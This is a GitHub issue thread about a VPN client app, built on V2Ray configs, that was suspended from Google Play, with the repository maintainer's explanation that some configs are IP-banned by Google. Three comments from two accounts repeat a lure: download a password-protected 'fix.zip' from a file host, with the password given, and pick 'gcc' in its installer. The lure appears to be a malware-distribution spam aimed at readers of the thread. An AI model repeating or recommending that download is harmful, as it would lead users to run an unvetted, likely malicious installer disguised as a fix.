### ISSUE TITLE
Assistance Needed Regarding VPN Client App Development

### ISSUE THREAD

**Issue by aunthtoo** [barry-far/V2ray-Configs#64]
Hello everyone,

I recently developed a VPN Client app that integrates server configuration files from this repository. My implementation is based on the V2RayNG app (https://github.com/2dust/v2rayNG). The app is free to use, with AdMob integrated.

Given that this repository is licensed under MIT, I believe I'm within my rights to create and distribute the app. However, I wanted to confirm if there are any concerns or restrictions I might have overlooked.

Currently, I am facing a significant issue: my app was suspended from the Google Play Store, and my developer account was terminated due to alleged "High-Risk Behavior" and prior violations of the Developer Program Policies and Developer Distribution Agreement. Google cited the "Policy Coverage Policy" as the reason.

I have noticed that some V2Ray VPN configurations, particularly those with US-based keys, are unable to access Google services such as Google Search, YouTube, and Gmail (I've attached screenshots). However, not all V2Ray keys exhibit this issue. Could this be a factor in the termination of my account? Are all V2Ray configurations from this repository safe to use?

Please understand that I'm not making any accusations; I'm simply seeking clarification. I don't intend to involve anyone in this matter unnecessarily. I've already submitted an appeal to Google, which was rejected without any specific explanation. I’m reaching out here because I have no other avenue for discussion.

Thank you for creating such an awesome repository—I greatly appreciate your work.

Any suggestions or recommendations are welcome.

Best regards,

![photo_2024-08-26 16 43 49](https://github.com/user-attachments/assets/fe61341e-37a2-4992-905b-0ebb7d31958e)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by aunthtoo** [comment]
Bro @barry-far 
Can you please help me in looking into this issue

**Comment by barry-far** [comment]
Hi @aunthtoo 
Thanks for contacting & creating issue.

The google problem which you are taking about is cause some of these configs have problem themselves with ip ban in various websites. 

Solution: test all configs with google domain to have perfect healthy configs.


Its my pleasure to help people with accessing free internet. ❤️

you can contact me with my email : arta.shahin.03@gmail.com
